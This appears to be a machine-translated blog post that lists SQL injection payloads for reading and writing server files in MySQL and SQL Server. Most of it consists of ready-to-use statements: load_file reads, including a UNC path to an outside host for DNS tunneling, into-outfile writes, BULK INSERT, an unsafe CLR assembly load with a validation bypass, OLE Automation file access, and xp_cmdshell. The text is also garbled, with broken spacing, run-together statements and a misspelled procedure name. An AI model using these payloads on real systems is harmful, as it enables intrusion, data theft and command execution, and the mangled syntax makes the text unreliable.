Summary of the methods for reading and writing files in SQL injection, and summary of SQL Injection reading and writing
Preface
SQL Injection includes direct SQL injection and file read/write injection. This article describes the content of file read/write in SQL injection. Let's take a look at it.
I. MySQL
Read files
Common read files can be replaced by a string in hexadecimal notation.
Select load_file ('C:/boot. ini ') select load_file (0x633a2f626f6f742e696e69) select load_file (' // ecma. io/1.txt ') # select load_file (' \\\\ ecma. io \ 1.txt ') # used for DNS Tunneling
Write files
I currently know two file writing methods:
select 0x313233 into outfile 'D:/1.txt'
select 0x313233 into dumpfile 'D:/1.txt'
Ii. SQL Server
Read files
1. BULK INSERT
create table result(res varchar(8000));bulk insert result from 'd:/1.txt';
2. CLR Integration
// Enable CLR integration exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'clr enabled', 1 reconfigure
create assembly sqb from 'd:\1.exe' with permission_set=unsafe
The above statement can use the create assembly function to load any. NET binary file from the remote server to the database. However, it will verify whether it is a valid. NET Program, leading to failure. The following is the read method.
select master.dbo.fn_varbintohexstr(cast(content as varbinary)) from sys.assembly_files
Bypass: First load a valid. NET binary file, and then append the file. The following is a bypass method.
create assembly sqb from 'd:\net.exe';alter assembly sqb add file from 'd:\1.txt'alter assembly sqb add file from 'd:\notnet.exe'
3. script. FileSystemObject
# Enable Ole Automation Procedures sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure 'ole Automation Procedures ', 1; RECONFIGURE;
declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'opentextfile', @f out, 'd:\1.txt', 1exec @ret = sp_onmethod @f, 'readline', @line outwhile(@ret = 0) begin print @line exec @ret = sp_oamethod @f, 'readline', @line out end
Write files
1. script. FileSystemObject
declare @o int, @f int, @t int, @ret intdeclare @line varchar(8000)exec sp_oacreate 'scripting.filesystemobject',@o outexec sp_oamethod @o, 'createtextfile', @f out, 'e:\1.txt', 1exec @ret = sp_oamethod @f, 'writeline', NULL ,'This is the test string'
2. bcpcopy file (test failure, no bcp.exe)
c:\windows>system32>bcp "select name from sysobjects" query testout.txt -c -s 127.0.0.1 -U sa -p"sa"
3. xp_cmdshell
exec xp_cmdshell 'echo test>d:\1.txt'
Iii. Oracle
Pass, Oracle is too pitfall ~~~ Almost all of them are restricted by PL/SQL.
Summary
The above is a summary of the reading and writing methods of SQL Injection files. I hope the content in this article will help you in your study or work. If you have any questions, you can leave a message.